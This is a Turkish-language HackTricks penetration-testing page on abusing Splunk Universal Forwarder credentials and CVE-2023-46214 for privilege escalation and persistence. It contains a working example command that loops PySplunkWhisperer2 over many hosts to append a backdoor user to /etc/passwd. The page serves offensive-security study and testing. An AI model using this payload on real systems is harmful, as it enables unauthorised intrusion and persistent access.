hacktricks/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
2024-02-10 18:14:16 +00:00

5.4 KiB
Raw Blame History

Splunk LPE ve Kalıcılık

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Bir makineyi içeriden veya dışarıdan numaralandırırken (port 8090) Splunk çalışıyorsa, şans eseri geçerli kimlik bilgileri biliyorsanız, Splunk hizmetini kullanarak Splunk'ı çalıştıran kullanıcı olarak bir kabuk çalıştırabilirsiniz. Eğer root çalışıyorsa, ayrıcalıkları root'a yükseltebilirsiniz.

Ayrıca, zaten root kullanıcısıysanız ve Splunk hizmeti yalnızca localhost'ta dinlemiyorsa, Splunk hizmetinden parola dosyasını çalabilir ve parolaları kırmaya veya yeni kimlik bilgileri eklemeye çalışabilirsiniz. Ve ana bilgisayarda kalıcılığı sürdürebilirsiniz.

Aşağıdaki ilk resimde, bir Splunkd web sayfasının nasıl göründüğünü görebilirsiniz.

Splunk Universal Forwarder Agent Exploit Özeti

Daha fazla ayrıntı için https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ gönderisine bakın. Bu sadece bir özet:

Exploit Genel Bakış: Splunk Universal Forwarder Agent (UF) hedef alan bir exploit, ajan parolasına sahip saldırganların ajanı çalıştıran sistemlerde keyfi kod çalıştırmasına izin vererek, tüm bir ağı tehlikeye atabilir.

Ana Noktalar:

  • UF ajanı, gelen bağlantıları veya kodun otantikliğini doğrulamaz, bu da yetkisiz kod çalıştırmasına karşı savunmasız hale getirir.
  • Ortak parola edinme yöntemleri, ağ dizinlerinde, dosya paylaşımlarında veya iç belgelerde bulunmalarını içerir.
  • Başarılı bir saldırı, kompromize edilen ana bilgisayarlarda SYSTEM veya root düzeyinde erişim, veri sızdırma ve daha fazla ağ sızma ile sonuçlanabilir.

Exploit Yürütme:

  1. Saldırgan UF ajan parolasını elde eder.
  2. Splunk API'sini kullanarak komut veya betikleri ajanlara gönderir.
  3. Olası eylemler arasında dosya çıkarma, kullanıcı hesabı manipülasyonu ve sistem tehlikeye atma bulunur.

Etki:

  • Her bir ana bilgisayarda SYSTEM/root düzeyinde izinlerle tam ağ tehlikeye atma.
  • Algılanmayı önlemek için günlüğü devre dışı bırakma potansiyeli.
  • Arka kapı veya fidye yazılımı kurulumu.

Exploit için Örnek Komut:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Kullanılabilir halka açık zafiyetler:

Splunk Sorgularını Kötüye Kullanma

Daha fazla ayrıntı için https://blog.hrncirik.net/cve-2023-46214-analysis adresindeki yazıyı kontrol edin.

CVE-2023-46214, bir script'in $SPLUNK_HOME/bin/scripts dizinine yüklenmesine izin veriyordu ve ardından |runshellscript script_name.sh arama sorgusu kullanarak orada depolanan script'in çalıştırılabilmesiniıkladı.

AWS hacklemeyi sıfırdan kahraman olmak için öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları: